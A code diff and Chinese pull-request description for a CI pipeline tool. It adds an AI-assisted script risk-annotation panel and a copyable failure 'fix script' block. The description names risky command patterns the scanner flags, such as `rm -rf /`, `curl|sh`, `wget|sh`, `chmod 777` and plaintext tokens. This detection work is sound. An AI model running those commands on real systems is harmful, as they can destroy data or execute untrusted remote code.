+        <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true">
+          <path d="M20 6 9 17l-5-5" />
+        </svg>
+        <span>未发现明显风险。继续保持。</span>
+      </div>
+
+      <!-- Findings list -->
+      <ul v-else-if="state === 'done' && hasFindings" class="rap-list" role="list">
+        <li
+          v-for="(f, idx) in sortedFindings"
+          :key="idx"
+          class="rap-item"
+          :class="`rap-item--${f.level}`"
+        >
+          <span class="rap-dot" :class="`rap-dot--${f.level}`" aria-hidden="true" />
+          <div class="rap-item-body">
+            <div class="rap-item-head">
+              <span class="rap-badge" :class="`rap-badge--${f.level}`">{{ levelLabel(f.level) }}</span>
+              <span class="rap-item-title">{{ f.title }}</span>
+              <span v-if="f.source === 'ai'" class="rap-tag-ai" title="AI 语义分析">AI</span>
+              <span class="rap-loc">
+                {{ f.stepName || '步骤' }}<template v-if="f.line > 0"> · 第 {{ f.line }} 行</template>
+              </span>
+            </div>
+            <p class="rap-why">{{ f.why }}</p>
+            <p v-if="f.suggestion" class="rap-fix">
+              <span class="rap-fix-arrow" aria-hidden="true">→</span>{{ f.suggestion }}
+            </p>
+          </div>
+        </li>
+      </ul>
+    </div>
+  </section>
+</template>
+
+<style scoped>
+.rap {
+  border-radius: var(--rounded-card);
+  border: 1px solid var(--color-cyan-line);
+  background: var(--color-card);
+  overflow: hidden;
+  box-shadow: var(--shadow);
+  margin-top: 18px;
+}
+
+.rap-head {
+  display: flex;
+  align-items: center;
+  gap: 10px;
+  padding: 11px 16px;
+  background: var(--color-cyan-soft);
+  border-bottom: 1px solid var(--color-cyan-line);
+}
+
+.rap-head-left {
+  display: flex;
+  align-items: center;
+  gap: 8px;
+  flex: 1;
+  min-width: 0;
+}
+
+.rap-icon {
+  color: var(--color-cyan);
+  display: grid;
+  place-items: center;
+  flex-shrink: 0;
+}
+
+.rap-title {
+  font-size: 0.82rem;
+  font-weight: 600;
+  color: var(--color-cyan);
+  white-space: nowrap;
+}
+
+.rap-subtitle {
+  font-size: 0.71rem;
+  color: var(--color-faint);
+  font-style: italic;
+}
+
+.rap-summary {
+  display: flex;
+  gap: 6px;
+  flex-shrink: 0;
+}
+
+.rap-chip {
+  font-size: 0.7rem;
+  font-weight: 700;
+  padding: 2px 9px;
+  border-radius: var(--rounded-full);
+  border: 1px solid transparent;
+  white-space: nowrap;
+}
+
+.rap-chip--high   { color: var(--color-red);   background: var(--color-red-soft);   border-color: var(--color-red-line, var(--color-red)); }
+.rap-chip--medium { color: var(--color-amber); background: var(--color-amber-soft); border-color: var(--color-amber-line); }
+.rap-chip--low    { color: var(--color-faint); background: var(--color-card-2);     border-color: var(--color-border-strong); }
+
+.rap-body {
+  padding: 16px 18px;
+  display: flex;
+  flex-direction: column;
+  gap: 14px;
+}
+
+.rap-actions {
+  display: flex;
+  align-items: center;
+  gap: 12px;
+  flex-wrap: wrap;
+}
+
+.rap-hint {
+  font-size: 0.76rem;
+  color: var(--color-faint);
+  line-height: 1.5;
+  flex: 1;
+  min-width: 18ch;
+}
+
+.rap-source {
+  font-size: 0.74rem;
+  color: var(--color-faint);
+  font-weight: 500;
+}
+
+.rap-source--ai {
+  color: var(--color-cyan);
+}
+
+.rap-error {
+  font-size: 0.8rem;
+  color: var(--color-red);
+  line-height: 1.5;
+}
+
+.rap-clean {
+  display: inline-flex;
+  align-items: center;
+  gap: 8px;
+  font-size: 0.84rem;
+  font-weight: 500;
+  color: var(--color-green);
+  padding: 8px 0;
+}
+
+.rap-list {
+  list-style: none;
+  display: flex;
+  flex-direction: column;
+  gap: 10px;
+  margin: 0;
+  padding: 0;
+}
+
+.rap-item {
+  display: grid;
+  grid-template-columns: auto 1fr;
+  gap: 11px;
+  padding: 12px 14px;
+  border-radius: var(--rounded-lg);
+  border: 1px solid var(--color-border);
+  background: var(--color-inset);
+  border-left-width: 3px;
+  animation: rap-in 0.35s var(--ease-out-expo, cubic-bezier(0.16,1,0.3,1)) both;
+}
+
+.rap-item--high   { border-left-color: var(--color-red); }
+.rap-item--medium { border-left-color: var(--color-amber); }
+.rap-item--low    { border-left-color: var(--color-border-strong); }
+
+@keyframes rap-in {
+  from { opacity: 0; transform: translateY(6px); }
+  to   { opacity: 1; transform: none; }
+}
+
+@media (prefers-reduced-motion: reduce) {
+  .rap-item { animation: none; }
+}
+
+.rap-dot {
+  width: 9px;
+  height: 9px;
+  border-radius: var(--rounded-full);
+  margin-top: 5px;
+  flex-shrink: 0;
+}
+
+.rap-dot--high   { background: var(--color-red); }
+.rap-dot--medium { background: var(--color-amber); }
+.rap-dot--low    { background: var(--color-border-strong); }
+
+.rap-item-body {
+  display: flex;
+  flex-direction: column;
+  gap: 5px;
+  min-width: 0;
+}
+
+.rap-item-head {
+  display: flex;
+  align-items: center;
+  gap: 8px;
+  flex-wrap: wrap;
+}
+
+.rap-badge {
+  font-size: 0.66rem;
+  font-weight: 700;
+  padding: 1px 7px;
+  border-radius: var(--rounded-full);
+  text-transform: uppercase;
+  letter-spacing: 0.03em;
+  flex-shrink: 0;
+}
+
+.rap-badge--high   { color: var(--color-red);   background: var(--color-red-soft); }
+.rap-badge--medium { color: var(--color-amber); background: var(--color-amber-soft); }
+.rap-badge--low    { color: var(--color-faint); background: var(--color-card-2); }
+
+.rap-item-title {
+  font-size: 0.85rem;
+  font-weight: 600;
+  color: var(--color-text);
+}
+
+.rap-tag-ai {
+  font-size: 0.62rem;
+  font-weight: 700;
+  color: var(--color-cyan);
+  background: var(--color-cyan-soft);
+  border: 1px solid var(--color-cyan-line);
+  padding: 0 5px;
+  border-radius: var(--rounded-full);
+  letter-spacing: 0.04em;
+}
+
+.rap-loc {
+  font-family: var(--font-mono);
+  font-size: 0.7rem;
+  color: var(--color-faint);
+  margin-left: auto;
+  white-space: nowrap;
+}
+
+.rap-why {
+  font-size: 0.8rem;
+  line-height: 1.55;
+  color: var(--color-dim);
+}
+
+.rap-fix {
+  display: flex;
+  gap: 6px;
+  font-size: 0.79rem;
+  line-height: 1.5;
+  color: var(--color-text);
+  padding: 6px 10px;
+  background: var(--color-cyan-soft);
+  border-radius: var(--rounded);
+}
+
+.rap-fix-arrow {
+  color: var(--color-cyan);
+  font-weight: 700;
+  font-family: var(--font-mono);
+  flex-shrink: 0;
+}
+</style>

--- a/web/src/components/run/DiagnosisPanel.vue
+++ b/web/src/components/run/DiagnosisPanel.vue
@@ -111,6 +111,23 @@ async function sendFeedback(verdict: FeedbackVerdict): Promise<void> {
   }
 }
 
+// ─── Fix script (AI moat): copy-to-clipboard ────────────────────────────────
+
+const fixScriptCopied = ref(false)
+
+async function copyFixScript(): Promise<void> {
+  const text = props.diagnosis?.fixScript ?? ''
+  if (!text) return
+  try {
+    await navigator.clipboard.writeText(text)
+    fixScriptCopied.value = true
+    setTimeout(() => { fixScriptCopied.value = false }, 1800)
+  } catch {
+    // Clipboard may be unavailable (insecure context / denied) — fail silently;
+    // the script is still visible for manual selection.
+  }
+}
+
 // ─── Confidence helpers ───────────────────────────────────────────────────────
 
 type ConfLabel = { text: string; cls: string }
@@ -264,6 +281,33 @@ function confidenceLabel(level: DiagnosisDTO['confidence']): ConfLabel {
                 <span>{{ fix }}</span>
               </li>
             </ul>
+          </div>
+
+          <!-- Fix script (AI moat): concrete copy-pasteable patch/command snippet -->
+          <div v-if="diagnosis.fixScript" class="dp-fixscript">
+            <div class="dp-fixscript-head">
+              <div class="dp-fixscript-label">
+                <svg width="11" height="11" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.2" aria-hidden="true">
+                  <polyline points="16 18 22 12 16 6"/><polyline points="8 6 2 12 8 18"/>
+                </svg>
+                一键修复脚本
+              </div>
+              <button
+                class="dp-fixscript-copy"
+                :class="{ 'dp-fixscript-copy--done': fixScriptCopied }"
+                type="button"
+                @click="copyFixScript"
+              >
+                <svg v-if="!fixScriptCopied" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" aria-hidden="true">
+                  <rect x="9" y="9" width="13" height="13" rx="2"/><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"/>
+                </svg>
+                <svg v-else width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.4" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true">
+                  <polyline points="20 6 9 17 4 12"/>
+                </svg>
+                {{ fixScriptCopied ? '已复制' : '复制' }}
+              </button>
+            </div>
+            <pre class="dp-fixscript-code"><code>{{ diagnosis.fixScript }}</code></pre>
           </div>
 
           <!-- Alternate causes (low confidence) -->
@@ -823,6 +867,89 @@ function confidenceLabel(level: DiagnosisDTO['confidence']): ConfLabel {
   font-family: var(--font-mono);
   font-size: 0.75rem;
   margin-top: 1px;
+}
+
+/* ─── fix script (AI moat) ───────────────────────────────────────────────── */
+.dp-fixscript {
+  display: flex;
+  flex-direction: column;
+  gap: 6px;
+}
+
+.dp-fixscript-head {
+  display: flex;
+  align-items: center;
+  justify-content: space-between;
+  gap: 8px;
+}
+
+.dp-fixscript-label {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  font-size: 0.7rem;
+  font-weight: 700;
+  text-transform: uppercase;
+  letter-spacing: 0.05em;
+  color: var(--color-cyan);
+}
+
+.dp-fixscript-copy {
+  display: inline-flex;
+  align-items: center;
+  gap: 5px;
+  font-family: var(--font-sans);
+  font-size: 0.72rem;
+  font-weight: 600;
+  color: var(--color-faint);
+  background: var(--color-card);
+  border: 1px solid var(--color-border-strong);
+  border-radius: var(--rounded-full);
+  padding: 3px 10px;
+  cursor: pointer;
+  transition:
+    color var(--duration-fast),
+    border-color var(--duration-fast),
+    background-color var(--duration-fast);
+}
+
+.dp-fixscript-copy:hover {
+  color: var(--color-cyan);
+  border-color: var(--color-cyan-line);
+  background: var(--color-cyan-soft);
+}
+
+.dp-fixscript-copy:focus-visible {
+  outline: 2px solid var(--color-primary);
+  outline-offset: 2px;
+}
+
+.dp-fixscript-copy--done {
+  color: var(--color-green);
+  border-color: var(--color-green-line);
+  background: var(--color-green-soft);
+}
+
+@media (prefers-reduced-motion: reduce) {
+  .dp-fixscript-copy { transition: none; }
+}
+
+.dp-fixscript-code {
+  margin: 0;
+  padding: 12px 14px;
+  background: var(--color-term);
+  border: 1px solid var(--color-border);
+  border-radius: var(--rounded-lg);
+  box-shadow: var(--shadow-inner);
+  overflow-x: auto;
+}
+
+.dp-fixscript-code code {
+  font-family: var(--font-mono);
+  font-size: var(--text-mono);
+  line-height: 1.7;
+  color: oklch(80% 0.04 160);
+  white-space: pre;
 }
 
 /* ─── alternate causes ───────────────────────────────────────────────────── */

--- a/web/src/views/ProjectPipeline.vue
+++ b/web/src/views/ProjectPipeline.vue
@@ -25,6 +25,7 @@ import EnvCredsTab from '../components/pipeline/EnvCredsTab.vue'
 import TriggersPanel from '../components/TriggersPanel.vue'
 import ValidationPanel from '../components/pipeline/ValidationPanel.vue'
 import AIGenerateWizard from '../components/pipeline/AIGenerateWizard.vue'
+import RiskAnnotationPanel from '../components/pipeline/RiskAnnotationPanel.vue'
 import YamlImportModal from '../components/pipeline/YamlImportModal.vue'
 import TemplatePickerModal from '../components/pipeline/TemplatePickerModal.vue'
 
@@ -517,6 +518,12 @@ const projectName = computed(() => String(route.params.id))
             :credentials="credentials"
             :servers="servers"
             @update="handleCanvasUpdate"
+          />
+
+          <!-- AI 脚本风险标注(护城河):对脚本步骤命令做风险体检,提交前先发现高危/泄漏/不可复现项 -->
+          <RiskAnnotationPanel
+            v-if="loadState === 'idle' && pipeline"
+            :project-id="projectId"
           />
         </div>
 


### PR DESCRIPTION
## 概述

两大 **AI 护城河(AI moat)** 能力,**完全复用既有 AI 基础设施**(`ai.Service` / `mask.Masker` / per-provider chat / `stripJSONFence` / 优雅降级范式),不重造轮子。

## 功能一:AI 脚本风险标注

对流水线脚本步骤(Epic 8 script step)命令做提交前「体检」。

- **确定性正则预扫(无需 AI 即有价值)** `internal/ai/risk.go`:`rm -rf /`、`curl|sh`/`wget|sh`、`chmod 777` / `chmod -R 777`、命令内**明文密钥/token**(`TOKEN=`、`--password`、`Authorization: Bearer`、`_authToken=` 等)、未固定 `latest` 镜像(步骤镜像 + `docker pull/run`)、部署动作缺健康检查、多行脚本未 `set -e`、`sudo` 提权。
- **可选 LLM 语义增强**:AI 已配则补充正则难枚举的语义级风险(缺回滚、不幂等、过度授权…);AI 不可用/失败/不可解析则**静默跳过**,仅回确定性结论(`aiEnhanced=false` + 人读 `aiReason`),**永不 500/panic**。
- **端点**:`POST /api/projects/{id}/pipeline/analyze-risks`(认证 + CSRF)。服务端读 settings 脚本步骤 → 据项目凭据建 Masker → `AnnotateRisks` → DTO。项目不存在 404,其余一律 200。
- **UI**:`web/src/components/pipeline/RiskAnnotationPanel.vue` 挂到「流水线编排」tab —— 按 高危/中危/提示 分组的风险清单 + 一键扫描 + AI/规则来源标识。

## 功能二:AI 失败修复脚本建议(扩展 7-2 诊断)

- 诊断模型新增 `FixScript`(可直接复制粘贴的修复脚本/补丁片段),**additive** 贯穿 `ai.Diagnosis` → `run.Diagnosis` → `diagnosis_json` 落库 → 冻结 diagnosis 子 DTO。
- 诊断 prompt 增 `fixScript` 输出项;采纳前脱敏(模型回显 secret 二次脱敏)。
- **UI**:`web/src/components/run/DiagnosisPanel.vue` 诊断面板新增「一键修复脚本」代码块 + 复制按钮。

## 复用的 AI 基础设施

- `ai.Service` 接口 + per-provider chat(新增 `chatWithTokens` 让风险标注用更小 `max_tokens`,`chat` 委托之,零行为变更)。
- `mask.Masker`(新增 `RunSecretSource.MaskerForProject`,按项目登记凭据明文,供不绑定具体 run 的出网脱敏)。
- `stripJSONFence` 容错剥 markdown 围栏;`humanizeDiagnoseErr` 人读错误;diagnose 的 `unavailable` 优雅降级范式。

## 脱敏 + 优雅降级保证

- **出网前脱敏铁律**:脚本/日志进 prompt 前一律 `Masker.Scrub`;模型回的任意字段二次脱敏。
- **检测到明文密钥时,标注本身绝不回显该密钥**——只标位置,不复制命中片段(杜绝「为报告泄漏而二次泄漏」)。
- `apiKey` 仅进程内解密取用、用完即弃,绝不进 prompt/日志/错误/结果。
- 风险标注 `AnnotateRisks` 永远返回 `(*RiskReport, nil)`;诊断 `Diagnose` 对所有 AI 不可用路径返回 unavailable;两端点 AI 未配/失败均 HTTP 200。

## 端点

- `POST /api/projects/{id}/pipeline/analyze-risks` (新增)
- `POST /api/runs/{id}/diagnose`(既有,响应 DTO additive 增 `fixScript`)

## 迁移

**无需迁移**。风险标注为 on-demand;`FixScript` 复用既有 `pipeline_runs.diagnosis_json` 列的 additive JSON 字段(`omitempty`,旧数据解码兼容)。

## 测试(全程 stubLLM,无真实网络)

- `internal/ai/risk_test.go`:确定性规则命中、明文密钥不回显、LLM 增强、出网脱敏(prompt + 二次)、降级、干净脚本、nil masker 不 panic。
- `internal/httpapi/ai_risk_test.go`:端点 happy / 404 / AI 未配降级。
- `internal/ai/diagnose_test.go` + `internal/run/diagnosis_test.go`:扩展覆盖 `FixScript` 采纳、往返、脱敏。

## 绿区证据

- 后端:`gofmt -l`(空)· `go vet ./...` · `go build ./...` · `go test ./...` 全绿。
- 前端:`npm run typecheck` · `npm run test`(22 文件 191 用例全过)· `npm run build` 全绿。

## 协作边界

只动 `internal/ai/*`、AI 端点(`internal/httpapi/ai*.go` + 新增 `ai_risk.go`)、诊断搬运字段、`run_secrets.go`(additive 方法)、编辑器/RunDetail 前端 AI 面板;`router.go` 仅追加一条路由。未触碰 dagrun/pipeline SpecLoader 重构面与 build/target 远程 runner 面。`cmd/pipewright/main.go` 无改动(复用既有 `WithSecretSource` 装配)。

🤖 Generated with [Claude Code](https://claude.com/claude-code)